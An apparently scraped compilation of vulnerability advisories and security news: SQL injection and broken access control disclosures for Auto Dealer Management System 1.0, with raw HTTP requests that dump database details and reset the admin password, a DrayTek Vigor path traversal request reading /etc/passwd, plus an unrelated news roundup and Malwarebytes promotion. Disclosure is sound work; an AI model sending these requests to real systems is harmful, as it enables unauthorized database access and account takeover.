[mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0913) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0913)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.### Affected Page:> sell_vehicle.php> On this page id parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: ?page=vehicles/sell_vehicle&id=*### Description:> The auto dealer management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below+ Admin user has full access to the system + Employee user has only a few menu access i.e. dashboard, car models and vehicle (available and transaction)> Employee could perform the SQL Injection by opening sell vehicle transaction from his/her profile. Therefore, low-privileged users could able to get the access full system.### Proof of Concept:> Following steps are involved:+ An employee open the sell vehicle transaction form and could perform the SQL injection with vulnerable parameter (?page=vehicles/sell_vehicle&id=1*)### Request:```GET /adms/admin/?page=vehicles/sell_vehicle&id=1%27+and+false+union+select+1,2,version(),database(),5,6,user(),@@datadir,9,10,11,12,13--+- HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5Connection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/219883719-cd26586d-694e-49a7-a2ba-deca9445382f.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT * from `transaction_list` where id = :id ");$sql->bindparam(':id', $id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo--------------------------------------------------------------------------# Auto Dealer Management System - SQL Injection on page manage_user.php and parameter is id, application url is (?page=user/manage_user&id=?) with low privilege authentication.### Date: > 18 February 2023### CVE Assigned:**[CVE-2023-0915](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0915)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0915) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0915)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.### Affected Page:> manage_user.php> On this page id parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: ?page=user/manage_user&id=*### Description:> The auto dealer management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below+ Admin user has full access to the system + Employee user has only a few menu access i.e. dashboard, car models and vehicle (available and transaction)> Although, employee user doesn't have manage_user.php access but due to broken access control, employee could able to perform the SQL Injection by opening manage_user.php page. Therefore, low-privileged users could able to get the access full system.### Proof of Concept:> Following steps are involved:1. Employee guess the page manager_user.php and pass the random id parameter that parameter is vulnerable to SQL injection (?page=user/manage_user&id=1*)### Request:```GET /adms/admin/?page=user/manage_user&id=1%27+and+false+union+select+1,user(),@@datadir,4,database(),6,7,8,9,10,11--+- HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5Connection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/219888637-627e3abb-4b7a-45e6-a22c-3a5c11b75b61.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT * FROM users where id = :id ");$sql->bindparam(':id', $id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo

Auto Dealer Management System 1.0 SQL Injection

Auto Dealer Management System version 1.0 suffers from a privilege escalation vulnerability due to a broken access control where a lower privileged user's cookie can be leveraged to takeover an administrative account.

# Auto Dealer Management System - Broken Access Control leads to compromise of all application accounts by accessing the ?page=user/list with low privileged user account

### Date:   
> 18 February 2023  
### Author Email:   
> navaidnasari@hotmail.co.uk  
### Vendor Homepage:  
> https://www.sourcecodester.com  
### Software Link:  
> [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html)  
### Version:  
> v 1.0  
### Broken Authentication:  
> Broken Access Control is a type of security vulnerability that occurs when a web application fails to properly restrict users' access to certain resources and functionality. Access control is the process of ensuring that users are authorized to access only the resources and functionality that they are supposed to. Broken Access Control can occur due to poor implementation of access controls in the application, failure to validate input, or insufficient testing and review.

### Affected Page:  
> list.php , manage_user.php

> On these page, application isn't verifying the authorization mechanism. Due to that, all the parameters are vulnerable to broken access control and low privilege user could view the list of user's and change any user password to access it.

### Description:  
> Broken access control allows low privilege attacker to change password of all application users

### Proof of Concept:  
> Following steps are involved:  
1. Visit the vulnerable page: ?page=user/list  
2. Click on Action and Edit the password of Admin

![image](https://user-images.githubusercontent.com/123810418/219884701-0f1feb4f-6c8a-4299-b510-1762461910ee.png)

4. Update the Password and Submit

5. Request:  
```  
POST /adms/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
Content-Length: 877  
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfODLB5j55MvB5pGU  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36  
sec-ch-ua-platform: "Windows"  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/adms/admin/?page=user/manage_user&id=1  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5  
Connection: close

------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="id"

1  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="firstname"

Adminstrator  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="middlename"

------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="lastname"

Admin  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="username"

admin  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="password"

admin123  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="type"

1  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundaryfODLB5j55MvB5pGU--

```  
6. Successful exploit screenshots are below (without cookie parameter)  
![image](https://user-images.githubusercontent.com/123810418/219884923-5283fca6-d509-4c48-9db0-f61ea6dbb352.png)

7. Vulnerable Code Snippets:

![image](https://user-images.githubusercontent.com/123810418/219884994-e74d7d48-4d45-4135-9a38-45e26c65434b.png)

![image](https://user-images.githubusercontent.com/123810418/219885023-a76afbe0-88f0-4aaa-89cd-1e541e511427.png)

### Recommendation:  
> Whoever uses this CMS, should update the authorization mechanism on top of the  list.php , manage_user.php pages as per requirement to avoid a Broken Access Control attack

Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo

Auto Dealer Management System 1.0 Privilege Escalation

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

Jessica Haworth 24 February 2023 at 13:09 UTC  
Updated: 24 February 2023 at 13:15 UTC

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

  

Twitter faced further criticism this week when Elon Musk’s social networking platform announced SMS-based 2FA will only be available to paying customers going forward.

The social media site historically enabled two-factor authentication (2FA) to all users, providing they connected their mobile phone number to their account.

This week, however, users were warned that this security option would no longer be available to users who did not pay for verification.

Of course, this sparked huge backlash online, particularly among the majority of those with non-paid accounts.

It’s worth noting, though, that users can still use 2FA with third-party authentication apps such as Google Authenticate.

Want the latest web security news straight to your inbox? Sign up to our newsletter here

Elsewhere, web hosting provider GoDaddy announced it had fallen victim to a cyber-attack… and this was part of a campaign lasting almost three years.

The company announced in a statement that it had evidence of an intrusion that took place back in December 2022, when “a small number of customers” complained about their websites being intermittently redirected.

In a filing to the US Securities and Exchange Commission (PDF), the American domain registrar also divulged that it had evidence this attack was linked to an earlier incident in March 2020, when an attacker “compromised the hosting login credentials of approximately 28,000 hosting customers to their hosting accounts as well as the login credentials of a small number of our personnel”.

GoDaddy says it believes these attacks, together with a 2021 compromise of its hosted WordPress service, “are part of a multi-year campaign by a sophisticated threat actor group”.

BACKGROUND Truffle Security relaunches XSS Hunter tool with new features

Finally, the maintainers of newly resurfaced tool XSS Hunter announced the introduction of optional end-to-end (e2e) encryption to its fork after a backlash from privacy-conscious users.

Truffle Security, which launched a new fork of the open source utility after its deprecation by original creator Matthew Bryant, were criticized earlier this month for inspecting potentially sensitive data generated by users after they shared anonymized statistics about the vulnerabilities unearthed.

As reported by The Daily Swig, users have now been reassured that e2e encryption has been added to the fork in a statement given by Truffle Security’s founder.

We also recently reported that Belgium has become the first European country to adopt a national, comprehensive safe harbor framework for ethical hackers, and how Frans Rosén topped PortSwigger’s top 10 web hacking techniques of 2022 with his research ‘Account hijacking using dirty dancing in sign-in OAuth-flows’.

You can catch up with the full range of our recent news coverage by visiting The Daily Swig’s homepage.

Here are some more web security stories and other cybersecurity news that caught our attention in the last fortnight:

**Web vulnerabilities**

*   FortiNAC / Critical / Unauthenticated RCE / An external control of file name or path in certain Fortinet FortiNAC versions allow attackers to execute unauthorized code / Patched and disclosed February 16
*   Node.js / Medium / CLRF injection / The fetch API in Node.js did not prevent CRLF injection in the host header potentially allowing attacks such as HTTP response splitting and HTTP header injection / Patched and disclosed February 16
*   Node.js / High / Permissions policies bypass / Non-authorized modules potentially accessible via / Patched and disclosed February 16
*   Kardex MLOG / Severity TBC / RCE / SSTI to RCE due to sanitization issue on industrial web interface / Patched January 24, disclosed February 7
*   Apache Kerby / LDAP injection / Vulnerability exists in / Patched and disclosed February 20

**Research and attack techniques**

*   PortSwigger’s\* Gareth Heyes demonstrated how to detect server-side prototype pollution without causing denial-of-service at AppSec Dublin conference earlier this month.
*   Researchers from CyberXplore detailed how they hacked GitHub for a whole month, resulting in the finding of six vulnerabilities, which are detailed in this blog post.
*   Software engineer Matt Frisbie built a purposely-malicious Google Chrome extension that steals as much data as possible to demonstrate what users could expose themselves to if they aren’t careful with what they install.

A security researcher has praised the merits of hacking on Apple’s bug bounty program

**Bug bounty/vulnerability disclosure**

*   A write-up from security researcher Omar Hashem, who fully took over a HubSpot account, details his failures on the path to exploitation. Research is inherently about trial and error, yet few write ups shared online talk about the things that didn’t work.
*   A researcher calling themselves ‘infiltrateops’ shared details on how they were awarded a decent payout from Apple and lauded the response from its security team.
*   Google released a review of all of the bugs found in its vulnerability reward program in 2022, revealing it fixed more than 2,900 issues in that year alone.

**New open source security tools**

*   Legitify, a tool for detecting and remediating security issues across GitHub and GitLab assets, added support for GPT-based misconfiguration scanning.
*   GuardDog, a tool used to identify malicious Python packages using Semgrep and package metadata analysis, has been updated to provide npm support, new heuristics, and easier CI integration.

\*PortSwigger is the parent company of The Daily Swig.

PREVIOUS EDITION Deserialized web security roundup: KeePass dismisses ‘vulnerability’ report, OpenSSL gets patched, and Reddit admits phishing hack

Deserialized web security roundup: Twitter 2FA backlash, GoDaddy suffers years-long attack campaign, and XSS Hunter adds e2e encryption

Categories: Business
CRN named Malwarebytes one of the “Coolest Endpoint And Managed Security Companies” on the 2023 CRN Security 100.



(Read more...)




The post Malwarebytes wins 2023 CRN 'Coolest Endpoint And Managed Security Companies' award appeared first on Malwarebytes Labs.

CRN, a trusted source for IT channel news and analysis, has named Malwarebytes one of the “Coolest Endpoint And Managed Security Companies” on the 2023 CRN Security 100 list.

The CRN Security 100 highlights channel-friendly cybersecurity vendors across a number of market segments including Endpoint and Managed Security, Identity Management and Data Protection, Network Security, and more. Solutions that leverage cloud-native technologies and provide more comprehensive detection capabilities are featured prominently on the list.

By featuring Malwarebytes on their list of key cybersecurity vendors for 2023, CRN recognizes the strides we’ve made to best serve our channel partners in the past year, including:

*   Expanding our partner network to more than **3,000 global MSP partners and over 250 percent growth YoY**
*   Forming new strategic partnerships with **Addigy, Atera, ConnectWise, GCN Group, Kaseya/Datto, Sherweb, TeamViewer, and Pax8, among others.**
*   Growing the MSP sales and marketing team **175 percent YoY to support partners across geographies and industries.**
*   Continuing to expand the Malwarebytes OneView platform to offer **Vulnerability & Patch Management, Application Block, DNS Filtering and MDR** in combination with award-winning EDR.

And on the Value Added Reseller (VAR) front:

*   Continuing to strengthen key partnerships with distribution and partners, including **TD Synnex, Carahsoft, CDW, SHI, Insight, and Howard Technologies**.
*   **Increasing transactions 100 percent YoY with VARs in the US**.
*   Working to align with key partners and distributors in EMEA and APAC, including **Climb Channel Solutions, Sysob, BlueChip, and ACA Pacific**.
*   Focusing on the K-12 market with VAR partners and distributors and **bringing our brand new mobile solution to schools** to secure the more than 50 million Chromebooks being used in K-12 globally.

Learn more about our partner program here: https://www.malwarebytes.com/partners

**The state of MSP cybersecurity**

As the attack surface gets bigger and bigger for businesses, it’s become clear that Managed Service Providers (MSPs) need a solution that both grows their business and meets the security needs of their customers.

But there’s a problem.

Constrained staff resources, skyrocketing costs, and the complexities of managing multiple solutions all make it difficult for MSPs to adapt to the constantly evolving cybersecurity landscape, leading to lengthy incident response times and business inefficiencies that limit growth.

In fact, Kaseya’s 2022 MSP Benchmark Survey shows that the second and third most common business challenges for MSPs right now are security and hiring, respectively.

*   In 2022, **39 percent of all ransomware attacks targeted service providers**, followed by 12 percent for healthcare and 9 percent for the manufacturing industry.
*   Many MSPs must support multiple tools in various environments with limited people. **Multiple licenses and vendors equals higher cost and less visibility.**
*   MSPs need to maintain **multiple compliance requirements** for their customers, including HIPAA, PCI DSS, and GDPR.

**Malwarebytes OneView**

Enter Malwarebytes OneView, a powerful and affordable security management platform that gives MSP security teams maximum control. For Value-added Resellers (VARs), Malwarebytes Nebula is the equivalent platform.

**Precise, thorough remediation**

As threats occur, OneView and Nebula offer intuitive and automated controls for rapid response powered by our award-winning Endpoint Detection and Response (EDR) technology. We offer seven layers of protection, multi-mode isolation, 72-hour ransomware rollback, and more.

**Single multi-tenant console**

OneView’s multi-tenancy enables MSPs to streamline operations with centralized management of customer server and workstation endpoints, license subscriptions, reporting, and global policies.

**Subscription management**

Intuitive design in OneView allows MSPs to easily track and manage customer license subscriptions across sites and provide a higher level of service and attention.

**Integrations**

With native integrations into leading remote monitoring and management (RMM) and professional services automation (PSA) platforms, Malwarebytes OneView enables your MSP team to streamline operations.

_Malwarebytes OneView dashboard view_

**Constantly expanding**

Malwarebytes has only continued to build upon both OneView for MSPs and Nebula for Value-Added Resellers (VARs), adding three new modules that simplify breach prevention within the same cloud interface MSPs already trust for detection and remediation:

**Vulnerability and Patch Management**

Enables MSPs to take control of their full vulnerability assessment and patching process, helping ensure defenses are up to date across their clients’ environments.

**DNS Filtering**

Regulate access to websites and other content on company-managed networks, which in turn reinforces the security of company data.

**Application Block**

Protects endpoints by preventing unauthorized software from executing across your clients’ sites.

For VARs, Malwarebytes Mobile Security is a new offering in Nebula which provides unified protection for Chromebooks, Android, and iOS mobile devices.

We plan to continue expanding OneView and Nebula with further product innovation, including adding more modules and in-platform integrations for OneView with other top remote monitoring and management (RMM) and professional services automation (PSA) platforms.

**Managed Detection And Response (MDR) For MSPs**

Gartner reports that, by 2025, 50 percent of organizations will be using Managed Detection and Response (MDR) services for threat monitoring, detection, and response functions that offer threat containment capabilities.

In other words, MDR is shaping out to be table stakes for any MSP provider in the coming years—but many MSPs lack staff or budget to build MDR programs in-house.

Launched last year, our purpose-built managed detection and response (MDR) offering for MSPs helps alleviate these challenges.

With our elite team of MDR analysts monitoring your customer endpoints 24x7, Malwarebytes MDR simply and effectively closes your security resources gap, reduces the risk of unknown threats to your customers, and increases your ability for new business growth.

**Value-Added Resellers (VARs) bolster their clients' cybersecurity with Nebula**

Our commitment to the channel doesn’t stop at MSPs.

By reselling our powerful solutions, VARs can combat the world’s most harmful threats and solve your customers’ unique security challenges.

Malwarebytes is committed to VAR success and has significantly invested in the channel with offerings that include sales and technical training, tools, and certifications.

**Partner Portal**

Our partner portal app is an easy way to access sales and marketing resources, register deals, and provide your customers with free trials.

**Sales and Technical Training**

Whether on-demand or onsite, Malwarebytes has the training curriculum to provide you with the necessary skillset to sell and support Malwarebytes solutions.

**Marketing Resources**

Malwarebytes will support your marketing initiatives and provide branded marketing and sales materials that can help you win deals.

_Malwarebytes Nebula dashboard view_

**Dedicated to MSP partner growth**

Malwarebytes is honored to receive the 2023 'Coolest Endpoint And Managed Security Companies' award by CRN—and we have no intentions of slowing down.

Apply today or reach out to us for a demo.

Malwarebytes wins 2023 CRN 'Coolest Endpoint And Managed Security Companies' award

A vulnerability classified as problematic has been found in DrayTek Vigor 2960 1.5.1.4. Affected is the function sub_1DF14 of the file /cgi-bin/mainfunction.cgi. The manipulation of the argument option with the input /../etc/password leads to path traversal. The attack needs to be done within the local network. The exploit has been disclosed to the public and may be used. VDB-221742 is the identifier assigned to this vulnerability.

It doesn’t filter the var option, so we can use /../to read arbitrary file.

    POST /cgi-bin/mainfunction.cgi HTTP/1.1
    Host: xxxxxxxx
    Content-Length: 61
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Origin: xxxxxxxx
    Referer: xxxxxxxxxx
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: SESSION_ID_VIGOR=7:26EB81E4EA6DC603661320EBD1C938DC
    Connection: close
    
    action=doCfgExport&option=/../etc/passwd-&rtick=1663484341535

Tag

#chrome